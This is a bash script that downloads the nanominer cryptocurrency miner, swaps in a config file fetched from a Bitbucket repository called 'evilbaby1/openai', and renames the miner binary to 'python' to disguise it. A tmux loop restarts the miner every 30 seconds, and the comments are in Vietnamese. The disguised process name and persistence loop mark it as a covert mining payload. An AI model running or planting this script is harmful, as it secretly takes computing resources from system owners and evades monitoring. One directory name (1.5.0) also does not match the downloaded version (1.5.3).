#! /bin/bash
set -x #echo on
if [ -f ${PWD}/nanominer-linux-1.5.3.tar.gz ]; then
    if pgrep -x "python" > /dev/null
then
    echo "scrip dang chay roi , ke cmn di "
    
else

echo "script da install , chay thoi "
cd nanominer-linux-1.5.0
./python
     
fi
exit
fi

wget https://github.com/nanopool/nanominer/releases/download/v1.5.3/nanominer-linux-1.5.3.tar.gz
tar xvzf nanominer-linux-1.5.3.tar.gz
cd nanominer-linux-1.5.3
rm config.ini
wget https://bitbucket.org/evilbaby1/openai/raw/3fe4365a056b4e0589f78d6b1280f97cb1bb0b3e/config.ini
mv nanominer python
chmod +x python
tmux new-session -d -s loop 'while (true);do if pgrep -x "python" > /dev/null; then echo "Miner dang chay roi , ke cmn di";else echo "Miner da install , chay thoi" && tmux new-session -d -s my_session1 './python';fi; sleep 30; done'

